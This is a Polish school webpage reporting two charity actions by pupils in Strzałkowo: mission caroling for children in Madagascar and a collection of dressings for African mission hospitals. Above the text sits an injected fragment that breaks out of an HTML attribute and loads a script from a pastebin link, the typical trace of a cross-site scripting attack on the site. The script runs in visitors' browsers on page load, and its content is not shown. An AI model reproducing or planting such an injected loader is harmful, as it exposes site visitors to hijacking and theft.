">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Kolędnicy Misyjni – dzieciom z Madagaskaru                                

Strzałkowo

6 stycznia 2016r.

 

 

            6 stycznia to niezwykła data. W tym dniu Kościół celebruje podwójne święto: Uroczystość Objawienia Pańskiego, tak zwane święto Trzech Króli i Misyjny Dzień Dzieci. Jest to więc szczególna okazja by z naśladując Mędrców ze Wschodu oddać cześć narodzonemu Zbawicielowi świata i jednocześnie okazać swą troskę o Kościół na misjach.

            Grupka naszych gimnazjalistów już po raz 12 odpowiedziała na zaproszenie Papieskich Dzieł Misyjnych i ochoczo zaangażowała się w akcję „Kolędnicy Misyjni”. Przedsięwzięcie to ma na celu budzenie świadomości misyjnej i wrażliwości na potrzeby drugiego człowieka. Łączy się z niesieniem konkretnej pomocy. Kolędując zbieraliśmy ofiary, które zostaną przeznaczone na realizację projektów pomocy dzieciom z Madagaskaru. Na tej czwartej co do wielkości wyspie na Ziemi dominuje ubóstwo, głód i niedożywienie. Brakuje należytego dostępu do podstawowej opieki zdrowotnej oraz edukacji. Pamiętajmy, że misje to nie tylko dzieło ewangelizacyjne ale także konkretna troska o człowieka, która ma przyczyniać się do niwelowania głównych problemów egzystencjalnych.

            Nasze kolędowanie poprzedziliśmy aktywnym udziałem we Mszy św. Po uroczystym błogosławieństwie ruszyliśmy do strzałkowskich domów ze śpiewem kolęd i krótką częścią artystyczną, przybliżającą trudną sytuację malgaskich dzieci.  Nazwa wyspy w języku malgaskim oznacza „Ląd na końcu świata” ale dla nas i tych, którzy nas przyjęli, stała się całkiem bliska. Każdej rodzinie zostawiliśmy kolędową pamiątkę: stajenkę betlejemską z malgaskim wizerunkiem świętej rodziny.

 

 I. Maćkowiak

„Opatrunek na ratunek”

 

Gimnazjum im. J. Korczaka w Strzałkowie

 

 

            Kolejny raz społeczność naszej Szkoły okazała swoje dobre serce i wrażliwość na potrzeby innych. Odpowiadając na apel Fundacji Pomocy Humanitarnej  „Redemptoris Missio” włączyliśmy się do akcji „Opatrunek na ratunek”. Jej celem było pozyskanie różnorodnych materiałów opatrunkowych. Bez takiej bazy udzielanie pomocy medycznej nie jest możliwe.

            W czasie trwania akcji, na terenie naszej Szkoły zbieraliśmy gazy, bandaże, opaski uciskowe oraz strzykawki i plastry. W sumie 5 kilogramów. Zebrane przez nas środki stanowią pomoc dla najuboższych pacjentów misyjnych szpitali w Afryce. Wszystkie opatrunki zapakowaliśmy
w paczkę i w grudniu 2015 roku wysłaliśmy do siedziby Fundacji.

            „Nie jest trudno być dobrym, wystarczy chcieć...”

 

  I. Maćkowiak